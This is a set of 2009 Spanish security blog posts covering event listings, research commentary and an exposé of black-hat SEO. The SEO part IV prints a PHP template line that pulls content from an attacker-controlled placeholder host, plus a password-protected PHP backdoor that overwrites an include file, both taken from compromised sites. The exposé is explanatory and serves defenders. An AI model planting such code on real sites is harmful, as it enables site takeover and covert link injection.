Un informático en el lado del mal

Eventos para la semana que viene

noreply@blogger.com (Maligno) — Thu, 12 Nov 2009 13:00:00 +0000

Tras el subidón que tengo con la aceptación de la charla en la Black Hat os voy a dejar una lista de cosas que tenemos para la semana que viene, para seguir estudiando ;)

Si te pilla bie Polonia, José "el abuelo" Parada y yo estaremos cantando en la CONFidence 2009 en Varsovia para hablar de Arithmetic Blind SQL Injection, Inverted SQL Injection y Time-Based Blind SQL Injection using Heavy queries. Para que nos salga muy bien, muy bien, pero que muy bien la charla nos iremos del miercoles a domingo, ya sabéis, para estar "en ambiente" allí, que creo que hay gente muy agradable...

Antes de irme estaré el lunes por la tarde dando una charla a través de Internet en e-Gaelica (que trae una agenda cuato menos "peculiar") y el martes en Palma de Mallorca en el Innovation Tour.

Mis compañeros se encargarán de llevar la Azlan D-Link Academy a Pamplona por primera vez. También estaremos en CEUS V, la 5ª edición de la Conferencia Española de Usuarios de SharePoint, que se celebrará en Madrid y que tiene charlas para todos los gustos, en sesiones plenarias y tracks en paralelo. Allí estaremos presentando Exchange Server 2010, Apolo (ya os hablaré más de él en futuros posts) y MetaShield Protector. Por último, para los amantes de los HOLs habrá dos Hands On Lab en Madrid esta semana y el día 18 nuestros amigos de Quest tienen un evento sobre VDI ...con magia...

Este es el resumen día a día:

- 16 [Pamplona] DL05 Cámaras de Video Vigilancia IP
- 17 [Pamplona] DL04 Tecnología WiFi
- 17 [Palma de Mallorca] Innovation Tour Palma de Mallorca
- 17 [Madrid] CEUS V
- 18 [Pamplona] DL03 Tecnología Firewalling
- 18 [Madrid] Quest VDI- 19 [Pamplona] DL02 Tecnología Switching
- 19 [Madrid] HOL-WIN58 MS Windows Server Update Services
- 20 [Madrid] HOL-WIN55 MS Windows Server 2K8R2. IPSec

Saludos Malignos!

Mentiría

noreply@blogger.com (Maligno) — Thu, 12 Nov 2009 06:56:00 +0000

Mentiría si dijera que no me gusta mi trabajo. Mentiría si dijera que cuando voy a dar una charla a esa Pamplona que me trata tan bien voy sufriendo. Mentiría si dijera que cuando voy a Galicia voy forzado a dar una conferencia o que cuando mi público son estudiantes o gente empezando con la seguridad informática lo hago a disgusto. Sería un gran mentiroso si dijera que cuando me dan un micrófono, conectan mi portátil a la salida de vídeo y es mi turno de hablar en una charla en Valladolid o Valencia estoy sufriendo o pensando en cuando se va a terminar. Diría otra mentira si dijera que cada vez que me subo al escenario del auditorio de Barcelona no tengo recuerdos buenos de todas las veces que he estado allí o que cuando en Madrid se monta un evento en el auditorio de Getafe, Kinépolis o los mega escenarios del auditorio de Congresos o el Juan Carlos I no me siento contento. Mentiría si dijera que ahora que estamos preparando nuestro viaje a las islas dijera que no estamos preparando ya una cena y cachondeo para nosotros.

Me gusta mi trabajo y aun, cuando después de tantos años parece que uno se puede llegar a cansar de este trabajo, todavía hay veces que abro el correo y disfruto como la primera vez.

Ayer me llegó la confirmación de que la charla de Connection String Parameter Pollution ha sido aceptada para la próxima Black Hat USA DC 2010 que tendrá lugar en Febrero en Whasington DC y mentiría si dijera que no me revolucioné y revolucioné a los compañeros.

Mail de confirmación
Estas conferencias, como espero que tenga la RootedCon en Madrid, tienen siempre algo de especial, por todo. La temática, los ponentes, el ambiente, la pasión que trae la gente y las cosas que se aprenden allí, no sólo en las charlas, también en los bares.

Es la tercera vez que voy a hablar en Black Hat, pero la primera en USA, y tenía muchas ganas de estar allí. Durante estos dos años y medio que hace que me decidí a dar charlas en inglés, he tenido la suerte de estar en conferencias muy chulas pero tenía ganas de ir a una BH USA. Cuando terminamos la charla en I64, sabíamos que tenía muchas posibilidades de ser aceptada, pero, como quería tener un detalle con mis amigos de la Ekoparty de Argentina, decidí que, aunque no nos la aceptaran en BH por haber sido “cantada” con anterioridad, primeramente se iba a estrenar en Buenos Aires.

Al final, todos contentos, porque me voy a la BH USA DC 2010 y mentiría si no estoy encantado.

Saludos Malignos!

Cauce natural

noreply@blogger.com (Maligno) — Wed, 11 Nov 2009 14:11:00 +0000

Curiosas las tendencias de uso de sistemas operativos según marketshare. Sube Windows Vista, sube Windows 7, bajan los Mac OS X, Linux sigue condenado por debajo del 1%, Windows XP cae poco a poco, esto parece como la comparsa de un plan universal pre-establecido para ganar "billones" de adeptos...

MarketShare hasta día de hoy

Saludos ....Malignos!

Ripley

noreply@blogger.com (Maligno) — Wed, 11 Nov 2009 07:31:00 +0000

Tal vez al leer este título hayas pensado rápidamente en Alien, el Octavo pasajero. Otro de esos personajes de culto de los que tengo libros, comics y todas las películas en versión original, extendida, y montaje del director en una edición especial que se llama Quadrology.

Si he de ser sincero creo que el que el proyecto se llame Ripley algo debe de tener que ver con dicha película ya que Ripley, incluso con su muerte o con esa relación materno-filial que mantuvieron en una de las entregas, siempre ha vencido al Alien.

Tal vez por eso los investigadores de Microsoft Research le pusieron este nombre al proyecto en el que se intenta, por medio de una nueva aproximación, vencer al Alien que se introduce entre la aplicación web y el servidor o tal vez porque es por medio de un clon, como en Alien Resurection, con el que se quiere ganar la batalla.

La idea de la arquitectura en tres niveles, o en tres capas, divide las responsabilidades de cada elemento de forma clara. El almacén de datos debe cuidar de la integridad de la información, la lógica de negocio que corra en el servidor de aplicaciones y la interfaz de usuario en el cliente. Si bien esta división de Navegador, Servidor Web y Motor de Base de datos con funcionalidades repartidas ha evolucionado a una mayor granularidad con la división interna en otras capas de las funciones, apareciendo capas de acceso a datos, componentes distribuidos, servicios y todo lo que lleva el diseño moderno de servicios, sigue siendo más que valido este modelo para definir las aplicaciones web a alto nivel.

Si se da por perdido el navegador, es decir, por totalmente infectado, malévolo, interceptado o directamente como principal enemigo, el servidor web debe tomar todas las entradas como potencialmente maliciosas. Este comportamiento se basa en el principio de Defensa en Profundidad de las reglas de la fortificación de sistemas por las que se asume que todo elemento adyacente puede estar comprometido.

La aproximación hasta el momento se ha centrado en validar los datos y es ahí donde los atacantes se han esforzado en evolucionar, hacia la forma de crear nuevos patrones válidos de entrada que se salten las medidas de seguridad establecidas en el servidor. Esta aproximación a la solución obvia por completo la existencia del elemento principal del cliente: El interfaz de usuario.

Para ello, el proyecto Ripley propone hacer un clon del interfaz de usuario y reproducir las acciones realizadas por el usuario en el interfaz pero en el servidor. Es decir, si un usuario realiza una secuencia de 10 clics en 10 zonas distintas de la interfaz para generar un listado de datos, tradicionalmente se convierte en una llamada a un procedimiento de un servidor con una serie de parámetros. En un entorno de ataque, es probable que esa llamada no se haya producido haciendo clics en el interfaz, sino manipulando las llamadas.

Con Ripley la idea es que se validen los 10 clics en un clon que va a correr en el servidor y que va a permitir saber si esa acción que está realizando el cliente está permitida por el interfaz de usuario o no. Para poder validar la interfaz se ejecutará el clon del navegador, escrito en .NET en esta prueba de concepto, en el servidor web y sobre dicho clon se probarán las acciones recibidas desde el cliente. Si las acciones funcionan en el clon se continuará adelante con la aplicación. Si no funcionan en el clon no se ejecutarán en el servidor.

Esta aproximación a la solución de validación es un punto más en la fortificación de aplicaciones y una nueva aproximación a la seguridad de de las mismas. Abre muchas interrogantes sobre la carga de cómputo en el servidor, sobre meter una nueva capa de software que también puede ser víctima de ataques o de que no reproduzca fielmente la interfaz. Esto es especialmente delicado en el usao de plug-ins o componentes corriendo en el navegador. De momento es un proyecto del mundo académico, pero desde luego es una idea curiosa.

Puedes leer el Paper de Ripley y tienes más información en Segu-Info.

Saludos Malignos!

Técnicas SEO para gente de moral relajada [IV de VI]

noreply@blogger.com (Maligno) — Mon, 09 Nov 2009 23:01:00 +0000

**********************************************************************************************
- Técnicas SEO para gente de moral relajada [I de VI]
- Técnicas SEO para gente de moral relajada [II de VI]
- Técnicas SEO para gente de moral relajada [III de VI]
- Técnicas SEO para gente de moral relajada [IV de VI]
- Técnicas SEO para gente de moral relajada [V de VI]
- Técnicas SEO para gente de moral relajada [VI de VI]
Autores: Chema Alonso & Enrique Rando
**********************************************************************************************

Como se ha visto en las primeras partes de este artículo, las técnicas hasta el momento se han basado en utilizar sistemas de Spam más o menos automatizados, desde la inclusión de comentarios o temas de debate en foros que son auto-contestados, hasta el aprovechamiento de cualquier sitio web que permita incluir HTML para poner anuncios, como el ejemplo visto con Moodle que puede ser trasladado a cualquier otro.

Sin embargo, hay otras formas de conseguir los tan deseados hipervínculos a las páginas de los clientes, aunque esto signifique cruzar la línea de la legalidad un poco más todavía. Para ello, los “expertos en posicionamiento de sombrero negro”, los Black SEO, utilizan las técnicas hacker más conocidas para colonizar, troyanizar o cambiar el código de una página web con links a los sitios que se desea subir en el ranking.

SQL Injection

Hace un par de años que se puso de moda el uso de explotación de vulnerabilidades en páginas web con SQL Injection para introducir código script que pudiera ser utilizado en la distribución de malware [Aviso Inteco]. En ese caso se realizaban inyecciones con comandos Update que añadían código javascript a cualquier string almacenado en la página web. David Carmona hizo una presentación sobre eso en el Asegúr@IT III que tuvo lugar en Bilbao.

La idea en este caso es similar, sólo que se van a introducir links en el contenido que se publica de una página web desde base de datos. Así, es posible encontrar sitios como el este de Castilla la Mancha donde se ha introducido código con hipervínculos.

Figura 15: Web de Castilla La Mancha vulnerada
En este ejemplo, los hipervínculos están visibles para el usuario, pero los expertos en Black SEO saben que esto no es lo recomendable ya que no es estrictamente necesario. Para ello, y con el fin de evitar que los administradores descubran que su sitio web ha sido vulnerado, aprovechan las funcionalidades que oferta HTML para ocultar dichos links.

Se utilizan técnicas como poner el tamaño de la letra invisible, o usar el comando display=”none” o incluso colocar capas con links en posiciones no visibles en el marco de la página. Son trucos sencillos, pero muy eficaces. Esto se pudo comprobar en el ejemplo del Teatro Real en el que aparecían links a Viagra ocultos en su web que no eran visibles a primera vista gracias a que el atacante usaba un estilo oculto.

Es fácil encontrar ejemplos así, basta con buscar en Google algún sitio y probar con un término propenso a ser cliente de Black SEO. En este caso en la Universidad de Alcalá de Henares aparecen más de 2.000 páginas recomendando Viagra.

Figura 16: Viagra en la Universidad de Alcalá de Henares
Basta con ir a una de ellas y analizarla. Aunque a primera vista no se ve nada.

Figura 17: Aparentemente no hay ningún enlace
En el código fuente están todos los links, en este caso mediante un código script que imprime los links en una capa invisible.

Figura 18: Hipervínculos ocultos en la web
Comprobar que esta página web tiene SQL Injection es trivial, una vez colonizada de esta manera.

Cómo el uso de texto oculto es algo que los buscadores penalizan, pudiendo llegar a ser motivo de exclusión de las páginas de resultados es común que se usen técnicas de ofuscación de código para engañar a las arañas e indexadores. Todo parásito inteligente hace lo posible por no acabar con el beneficio que le ofrece su víctima.

Modificación de plantillas

Por supuesto, lo mejor es poder tener una arquitectura flexible que permita cambiar los enlaces dinámicamente. Con ese objetivo los Black SEO tratan de modificar directamente las plantillas de documentos mediante la inclusión de un fichero contralado. En ese fichero controlado se pueden ir cambiando directamente los links, lo que permitirá al Black SEO decidir que sube y que baja, simplemente, cambiando el contenido de un fichero de texto.

Para ello se buscan webs vulnerables que permitan modificar los ficheros. Las técnicas de RFI o la explotación de vulnerabilidades que permitan ejecutar comandos son las más apetecibles para estos ataques. Una vez obtenido este privilegio, sería suficiente con añadir una línea como la siguiente en la plantilla de la víctima.

[?=@file_get_contents("http://web_controlada_por_los_malos/1.txt");?]

En la imagen siguiente se puede ver uno de estos ficheros listo para inyectarse en webs vulnerables.

Figura 19: Fichero para incluir en sitios vulnerados
Con realizar una búsqueda en Google o en Bing por alguno de esos links que aparecen ene este fichero es fácil descubrir cuáles han sido los sitios vulnerados.

Figura 20: Instituto de Desarrollo Regional de la Universidad de Castilla La Mancha
Guerra de Bandas

Una vez que se tiene controlado un sitio web del que se está obteniendo tráfico y pagerank es conveniente defenderlo contra otros Black SEO de moral más relajada aun. Así es curioso descubrir como en ciertos sitios se coloniza con un fichero que le permite al atacante subir sus cambios y la vulnerabilidad utilizada se cierra frente a otros posibles atacantes.

Éste es un ejemplo de un código utilizado para sobre-escribir el fichero de inclusión de un sitio web en el que se usa un LFI, y como éste es protegido por un clave que se envía por post y se co en MD5.

[?php
$secret_key = 'sd;gij32498gjwevgfdsgvluergbw3489';
$file_to_post = 'inc.php';
if (isset($_POST['data']) && isset($_POST['secret'])) {
if (md5($secret_key) == $_POST['secret']) {
$hFile = fopen($file_to_post, 'w');
if (!$hFile) { die('error opening file'); }
if (FALSE !== fwrite($hFile, stripslashes($_POST['data'])))
{ echo 'OK'; fclose($hFile); } else { echo '### 404 ###'; }
} else { echo "### 404 ###"; }
} else { echo "### 404 ###"; }
?]

**********************************************************************************************
- Técnicas SEO para gente de moral relajada [I de VI]
- Técnicas SEO para gente de moral relajada [II de VI]
- Técnicas SEO para gente de moral relajada [III de VI]
- Técnicas SEO para gente de moral relajada [IV de VI]
- Técnicas SEO para gente de moral relajada [V de VI]
- Técnicas SEO para gente de moral relajada [VI de VI]
Autores: Chema Alonso & Enrique Rando
**********************************************************************************************

Líneas de Investigación

noreply@blogger.com (Maligno) — Mon, 09 Nov 2009 08:57:00 +0000

No es la primera vez que me preguntan sobre qué puede realizar alguien para dedicarse a seguridad, qué debe leer, qué debe estudiar o qué debe practicar. La verdad es que la pregunta no es difícil, pero la respuesta sí que lo es. Dedicarle 25 horas al día suele ser lo más apropiado, estudia todo lo que caiga en tu mano y ya puede ser tu hobby esto de la seguridad informática para que un fin de semana te lo pases haciendo pruebas a cualquier cosa.

Hoy os dejo tres presentaciones que me tienen un poco enganchado con algunas pruebas. Son tres presentaciones muy interesantes que, seguro, seguro, seguro, que si te dedicas a esto, o ya has oído hablar de ellas, o las has leído o estás probándolas.

Unicode Transformations And Security Vulnerabilities

Esta presentación está focalizada en el estudio de las implicaciones de seguridad en el uso de UNICODE en los navegadores hoy en día. Desde los visual spoofings mediante la simulación de URLs usando caracteres distintos en codificación UNICODE pero iguales en representación gráfica, hasta las más divertidas transformaciones de estos cuando su representación debe ser truncada a ASCII. La presentación está disponible en la siguiente URL: Unicode Transformations And Security Vulnerabilities. Hay un preview de un paper sobre Unicode Security publicado en la web de Blackhat, dónde el autor dio una charla anterior sobre este tema, que ayuda a comprender mejor la presentación: Preview of Paper about Unicode Security

Entreprise Open Source Intelligence Gathering

Esta presentación se hizo pública en Ohio, hace apenas una semana. Es una recopilación sobre fugas de datos en la empresa a través de twitts, posts en blogs, facebooks y por supuesto metadata. Me ha gustado mucho la recolección de ejemplos, y reconozco que se me ha escapado más de una sonrisilla con ellos.

Enterprise Open Source Intelligence Gathering

View more presentations from agent0x0.

Renegotiating TLS

Ésta es la presentación que más polémica está levantando en los últimos momentos. Este trabajo muestra cómo es posible, a través de un fallo en la implementación de la renegociación TLS, de inyectar datos en claro entre el cliente y el servidor en una conexión cifrada y autenticada con TLS. La polémica que está levantando la ha recogido, con su estilo pulcro y acertado, nuestro amigo “Pajarraco” de los Santos en Una-al-día, pero merece la pena leerse el documento publicado y analizar los gráficos para comprender mejor el fallo. Para hacerlo mucho más llevadero, además, se han publicado tramas de red de ejemplo. Todos en la Web de la publicación: Renegotiating TLS.

Tres temas curiosos, que seguro que te aportan nuevas ideas para hacer nuevas cosas. Así funciona esto.

Saludos Malignos!

No Lusers 78: Feisbuk Fans

noreply@blogger.com (Maligno) — Sat, 07 Nov 2009 23:05:00 +0000

Mi lado Googly

noreply@blogger.com (Maligno) — Fri, 06 Nov 2009 23:01:00 +0000

Apovechando que es puente voy a cambiar el tercio y hablaros de alguna chorrada mía. De Google hay cosas que me gustan y cosas que no, pero si he de decir alguna de las que sí que me gustan, elijo a sus diseñadores gráficos y, en especial, a los que controlan y preparan los logitos del buscador. Periódica, y a veces sólo para algunos paises, Google va cambiando el logo de su buscador para conmemorar los juegos Olímpicos, el aniversario de alguna personalidad o el día nacional de algún país.

Han pasado por él personajes ilustres como Miguel Angel, Picasso o Michael Jackson, junto a otros personajes como Epi & Blas o la Gallina Capotana. Es toda una cultura y un estilo de hacer diseño que podéis revisar en la url de los logos de Google. Yo he seleccionado 20 que me han gustado mucho. ¿Cuál es el que más te gusta a ti?

Se acabaron los Juegos Olímpicos de Atenas

El loco del pelo rojo

Andy Warhol

Google Lego

Google Braille

Miguel Ángel

Pablo Picasso

Large Hadron Collider

Doraemon... ¿o es el de Cálico?

Uno de los especiales de Halloween

Velázquez

Don Alfredo

Dilbert & Google. No te pierdas la serie

Nuestro amigo Triki

Las patas de Caponata

Liga de la Justicia

Castellers Catalans

Epi & Blas

Astro Boy

Asteríx y Obelíx con el loco romano
Hay un blog dedicado a los logos oficiales y no oficiales de Google con más de una obra de arte sobre esta pasión de diseñar logos de una compañía de Software. Esto si que es saber ser googly. Mola la votación de los logos oficiales y que esté en tercer lugar uno dedicado a nuestro Joan Mirò.

Saludos Malignos!

Décimo Aniversario Informática64

noreply@blogger.com (Maligno) — Thu, 05 Nov 2009 23:01:00 +0000

El pasado 1 de Octubre celebramos el décimo aniversario de Informática64. El evento tuvo muchas más cosas a parte de la sesión plenaria, pero al menos os dejamos aquí las charlas de la misma.

Juan Luis G. Rambla: MS Forefront Threat Management Gateway

Forefront Threat Management Gateway

View more presentations from chemai64.

Alejandro Martín Bailón: MetaShield Protector

MetaShield Protector

View more presentations from chemai64.

Joshua Sáenz: MS Exchange Server 2010, Message Stats & Apolo

Exchange Server 2010 & Message Stats

View more presentations from chemai64.

Chema Alonso: Connection String Attacks

Connection String Parameter Pollution

View more presentations from chemai64.

Saludos Malignos!

Eventos, Hols y Webcasts semana del 9

noreply@blogger.com (Maligno) — Thu, 05 Nov 2009 13:39:00 +0000

La próxima semana, como tenemos un lunes festivo, el número de actividades es menor. El Innovation Tour irá sólo a Zaragoza, la campaña de los Hands On Lab será sólo en Madrid y se realizarán solo un par de Webcasts el jueves. Como curiosidad, esta semana, el Viernes 13 comenzará el Módulo 2 del FTSAI V y este miércoles en se realizarán las últimas pruebas para los dos próximos cursos de Antihacking que darán comienzo, de forma gratuita para desempleados y profesionales en situación de mejora de empleo, a partir del 16 de Noviembre.

Las pruebas tendrán lugar a las 10:00 de la mañana o a las 16:00 de la tarde en el “Centro de Formación en Tecnologías de la Información y las Comunicaciones - Madrid Sur” del Servicio Regional de Empleo de la Comunidad de Madrid" que está sito en la Avenida Arcas del Agua s/n, CP: 28905, Getafe (Madrid), metro Conservatorio.

Esta es la distribución por días:

martes, 10 de noviembre de 2009

[Madrid] HOL-SPS04 MS Windows Sharepoint Services V3

miércoles, 11 de noviembre de 2009

[Madrid] HOL-SPS09 MS Sharepoint Server 2007. Arquitectura de Portales
[Madrid] HOL-SMS11 System Center Configuration Manager 2007 (SMSv4)
[Getafe] Prueba Acceso AntiHacking

jueves, 12 de noviembre de 2009

[Madrid] HOL-SPS10 MS Sharepoint Server 2007. Entornos Colaborativos
[Zaragoza] Innovation Tour
[Webcast] Alta disponibilidad en Exchange Server 2010
[Webcast] Novedades de C# 2008

viernes, 13 de noviembre de 2009

[Madrid] HOL-SPS07 MS Sharepoint Server 2007. Business Intelligence
[Madrid] FTSAI V: Auditoría de Servidores y Clientes
[Webcast] Optimización de Microsoft SQL Server

Saludos Malignos!

Esquema Nacional de Seguridad: Metadatos

noreply@blogger.com (Maligno) — Wed, 04 Nov 2009 23:01:00 +0000

"La finalidad del Esquema Nacional de Seguridad es la creación de las condiciones necesarias de confianza en el uso de los medios electrónicos, a través de medidas para garantizar la seguridad de los sistemas, los datos, las comunicaciones, y los servicios electrónicos, que permita a los ciudadanos y a las Administraciones Públicas, el ejercicio de derechos y el cumplimiento de deberes a través de estos medios."

Así reza un párrafo en la primera hoja del borrador que se ha hecho público del primer borrador del Esquema de Seguridad Nacional.

Como se puede ver a lo largo de las 60 páginas que conforman el documento, está compuesto de un conjunto de normas y recomendaciones creadas para garantizar la seguridad de los usuarios en el ejercicio de su derecho a interactuar con la administración pública mediante el uso de mecanismos informáticos.

Actualmente es un borrador, pero a nosotros nos ha llamado la atención exactamente este párrafo en concreto del artículado:

"5.7.6 Limpieza de documentos

En el proceso de limpieza de documentos, se retirará de estos toda la información adicional contenida en campos ocultos, meta-datos, comentarios o revisiones anteriores, salvo cuando dicha información sea pertinente para el receptor del documento.

Esta medida es especialmente relevante cuando el documento se difunde ampliamente, como ocurre cuando se ofrece al público en un servidor web u otro tipo de repositorio de información.

El incumplimiento de esta medida puede perjudicar:

a) Al mantenimiento de la confidencialidad de información que no debería haberse revelado al receptor del documento.

b) Al mantenimiento de la confidencialidad de las fuentes u orígenes de la información, que no debe conocer el receptor del documento.

c) A la buena imagen de la organización que difunde el documento por cuanto demuestra un descuido en su buen hacer."

Como se puede ver, hace referencia al tema de meta-dados, información oculta y los datos perdidos, algo con lo que llevamos siendo pesados hace más de un año y que llevó a la creación de la FOCA, OOMetaextractor y, por supuesto, MetaShield Protector.

Al leer este párrafo, parece que hablan exactamente de esta herramienta, de MetaShield Protector, una herramienta que limpia, automáticamente, todos los metadatos e información oculta en documentos Microsoft Office, OpenOffice y PDF de los archivos publicados en la web antes de que estos sean entregados al usuario. ¿A que parece que lo he escrito yo?

Los más veteranos estaréis ya un poco cansados de este tema, pero para los más nuevos, os dejo las referencias a todos los artículos que hablan de este tema:

- Metadatos, Información Oculta y datos Perdidos en OpenOffice
- Metadatos, Información Oculta y datos Perdidos en Microsoft Office
- MetaShield Protector
- FOCA Manual de Usuario

Saludos Malignos!

Técnicas SEO para gente de moral relajada [III de VI]

noreply@blogger.com (Maligno) — Wed, 04 Nov 2009 08:12:00 +0000

**********************************************************************************************
- Técnicas SEO para gente de moral relajada [I de VI]
- Técnicas SEO para gente de moral relajada [II de VI]
- Técnicas SEO para gente de moral relajada [III de VI]
- Técnicas SEO para gente de moral relajada [IV de VI]
- Técnicas SEO para gente de moral relajada [V de VI]
- Técnicas SEO para gente de moral relajada [VI de VI]
Autores: Chema Alonso & Enrique Rando
**********************************************************************************************

Infraestructura de links: La telaraña

Una página enlaza obtendrá mayor relevancia cuanto mayor sea la relevancia que realiza el enlace. Es por eso que en muchos mensajes de spam y en muchas de las inserciones masivas de enlaces no se apunte directamente a la página que se desea subir la relevancia, sino a otras que apuntan a ella. Esto ayuda a evitar ser detectados, o al menos lo pone más difícil, ante los buscadores.

Supongamos que A es la página web que se desea subir en relevancia, para ello se añaden links desde B. A la hora de subir la relevancia los ataques a paginas C se harán o bien apuntando directamente a A o bien apuntando directamente a B. Esto, si B es una página legítima vulnerada, confundirá más si cabe a los buscadores, y mostrará a la página A apuntada desde múltiples dominios lo que la hará parecer más relevante.

Debido a esto, los hilos de salida de estas telarañas no siempre son los sitios web a promocionar. En su lugar, pueden encontrarse páginas cuyos contenidos son controlados por estos “posicionadores” y que suelen operar a modo de escaparate.

Figura 10: Spam con links iniciales de telarañas de links
Muchas veces esas webs de inicio son perfiles de usuario en plataformas web de cualquier tipo que permitan registrarse libremente ya sea por configuración normal o por un error administrativo. En el ejemplo de la Figura 10 se puede ver como se enlazan perfiles de usuario de plataformas Moodle. Como era de esperar, lógicamente, ese perfil en Moodle no es más que un anuncio publicitario en toda regla.

Figura 11: Perfil de Moodle usado para anunciar Viagra
Anuncios: Una imagen vale más que mil palabras

Moodle es una plataforma de software libre para la teleformación usada en numerosos proyectos educativos. A pesar de todas las ventajas que puedan ofrecer, en muchas ocasiones el punto débil de estos sistemas es la forma en que son administrados. No es raro que sea el propio personal docente, que ya tiene otras ocupaciones, quien gestione tanto la instalación y actualización de los sistemas como los contenidos y las cuentas de usuario.

Como resultado, es habitual que sea posible registrar cuentas de usuario sin pasar por el control de un supervisor. Por otro lado, Moodle permite a cada usuario crear su propia página web con su perfil y le proporciona muchas facilidades a la hora de incorporar contenidos HTML a dicha página. Tantas oportunidades no podían pasar desapercibidas y como se puede apreciar en la Figura 12 siguiente hay más de 535.000 usuarios de Moodle que han decidido utilizar su perfil para anunciar Viagra.

Figura 12: Cuentas de usuario de sistemas Moodle convertidas en escaparates
Algunos, incluso, aprovechan estas características para personalizar su perfil de forma que no se note que pertenecen a sistemas Moodle, como en el caso de la Figura 13, con una imagen lo suficientemente bien diseñada para simular una web.

Figura 13: Parece una página propia pero no lo es
Lo que parece una página web no es más que una imagen que ocupa toda la ventana del navegador. Ocultos tras esta imagen, se han introducido enlaces y textos con el objeto de atraer la atención de los buscadores hacia sí y hacia otras páginas.

Explotación de la infraestructura

La profesionalidad de estos autollamados posicionadores SEO hace que se creen sitios e incluso dominios para alojar y gestionar las infraestructuras que necesitan para su trabajo. Así, en el caso anterior, la URL de la imagen mostrada era: http://fredbam.com/i/screen3.gif.

Con sólo modificar el número 3 por otros valores se puede comprobar que disponen de hasta 20 imágenes distintas con las que personalizar sus perfiles:

Figura 14: Máscaras para disfrazar perfiles Moodle
Estos escaparates permiten ofrecer servicios tanto de posicionamiento en buscadores como de redirección de tráfico a otros sitios web con objeto de incrementar sus visitas.

Si controlas páginas B con relevancia, puedes promocionar muchas páginas A cobrando pasta por ello. En estos negocios, la flexibilidad es siempre un valor añadido: Hoy Viagra, mañana otro producto, pasado mañana, por qué no, partidos políticos, que se están subiendo al carro del SEO muy rápidamente.

Este ejemplo visto con plataforma Moodle se repite sistemáticamente con cualquier otra plataforma que permita crear cuentas de usuario sin un control estricto.

**********************************************************************************************
- Técnicas SEO para gente de moral relajada [I de VI]
- Técnicas SEO para gente de moral relajada [II de VI]
- Técnicas SEO para gente de moral relajada [III de VI]
- Técnicas SEO para gente de moral relajada [IV de VI]
- Técnicas SEO para gente de moral relajada [V de VI]
- Técnicas SEO para gente de moral relajada [VI de VI]
Autores: Chema Alonso & Enrique Rando
**********************************************************************************************

Día Internacional de la Seguridad Informática 2009

noreply@blogger.com (Maligno) — Tue, 03 Nov 2009 06:33:00 +0000

En 1998 ACM, la Association for Computing Machinery, declaró el 30 de Noviembre como el Día de la Seguridad Informática. Esto es algo que Jorge Ramió se encarga de recordarnos todos los años cuando da comienzo el Día Internacional de la Seguridad Informática en la Escuela Universitaria de Informática de la Universidad Politécnica de Madrid.

Jorge y Justo Carracedo llevan ya varios años pegándose con este DISI en el que yo he tenido el honor ya de participar. Lo cierto es que el primer año mi aparición fue desde el banquillo. Sí, allá por el 30 de Noviembre de 2006 me pidió Jorge que diera una sesión, exáctamente la última del día, justo antes del cierre de la conferencia, para sustituir a un ponente que no pudo venir. En esa ocasión me pillaba enfrascado en pleno Proyecto de Fin de Carrera de la Ingeniería Informática y di una charla sobre Blind SQL Injection en la que hablé de las consutas pesadas por primera vez.

Al margen de mi peculiar participación en el DISI, por este evento han pasado ilustres nombres nacionales e internacionales. El DISI siempre quiere traer a un científico importante a estas conferencias. Así, han pasado ya del Dr. Martin Hellman, el Dr. Hugo Scolnik o la Dra. Radia Perlman para dar charlas de lo más interesantes. He de reconocer que la charla de Radia me encantó el año pasado.

Este año, como no podía ser menos, tendremos al Dr. Hugo Krawczyk, de IBM Research, experto en criptografía que, además, habla perfectamente castellano y dará su conferencia en español. Como acompañantes, estará una lista de amigos de por aquí, como son Ero Carrera de Virus Total, Emilio Castelote de Panda Security, Alejandro Ramos "dab" de SecurityByDefault, Fermin J. Serna de Spectra. Además nos acompañarán José Bidot de Segurmática Cuba y Luís Guillermo Castañeda, que viene desde México.

Para completar la jornada, y teniendo en cuenta que estamos en crisis, todo esto vendrá acompañado de un desayuno cóctel de 45 minutos para charlar con la gente y hacer amigos y sin costar un duro. Es decir, sólo tienes que apuntarte, venir a las charlas, desayunar gratis, conocer gente y encima recibir un certificado acreditativo de 5 creditos CPE de formación continua en seguridad infórmática. ¿No está mal, verdad?

Tienes toda la información en la URL del DISI 2009.

Saludos Malignos!

Cagadas IV: El digrama entidad relación

noreply@blogger.com (Maligno) — Mon, 02 Nov 2009 21:01:00 +0000

El proceso de normalización de las bases de datos mediante las formas normales de nuestros amigos Boyce-Codd lleva a la generación de un modelo de almacenamiento de datos en las que las entidades están relacionadas entre sí con claves foráneas incrustadas en la misma tabla de almacenamiento de la entidad o, si la relación es n-m, al establecimiento de una tabla intermedia que almacena las claves foráneas de las entidades relacionadas en tal grado de relación n a m.

Dicho esto he de decir que mi cerebro funciona bien en almacenamiento, pero mal en relación. Es decir, soy capaz de recordar caras que he visto una única vez en un evento, pero me cuesta mucho recordar dónde cojones fue el lugar si la entidad cara es situada en otro lugar. Así, desde hace tiempo me esfuerzo, mientras estoy hablando con alguien, de recordar exactamente cuándo fue la última vez que nos vimos y dónde.

Conocido ya esto por vosotros, dejadme que os narre mi paso por una conferencia de la Universidad Politécnica en la que iba a dar una charlita. Allí, por cortesía del comité organizador, había una comida con los ponentes que participaban en la sesión. Cuando llegué, con la hora pegada al culo como de costumbre, se encontraban todos reunidos así que pasé a saludar a todos los personajes que allí daban rienda suelta al gañote antes de la sesión de la tarde.

Entre los contertulios se encontraba nuestro querido Little buda y creo que Mercè Molist, junto a una persona de la que me sonaba su cara y que se llamaba Miguel Ángel:

- “Hola, ¿nos conocemos de algo?”, dije yo entre confundido y descolocado.
- “Pues… no sé, no creo”, respondió él.
- “Vaya, pues yo creo que sí, porque tu cara me suena, de alguna otra charla, seguro”.

Él se quedó pensativo y le estuvo dando vueltas a la cabeza, pero no encontraba ningún indicio que le hiciera recordar que nos conocíamos. Eso a mí me extrañaba, sobre todo teniendo en cuenta que estaba de por medio Little Buda, que es famoso por no parar un minuto de organizar historias y a mí me había involucrado ya en varias.

- “¿Estás seguro?”, insití yo ya totalmente descolocado. “Pues es raro, tu cara me suena, juraría que nos conocemos”, terminé de decir.

Tras un minuto de pensar él contesto:

- “Pues como no sea que me conozcas de cuando yo era actor. Hice una serie que fue muy famosa que se llamaba Verano Azul en la que yo era conocido como el Piraña y tal vez sea de ahí”, me dijo.

Fail.

Miguel Ángel Valero, de Piraña a Doctor en la Universidad Politécnica de Madrid.

Saludos Malignos!

Porno amateur con Windows7

noreply@blogger.com (Maligno) — Sun, 01 Nov 2009 23:30:00 +0000

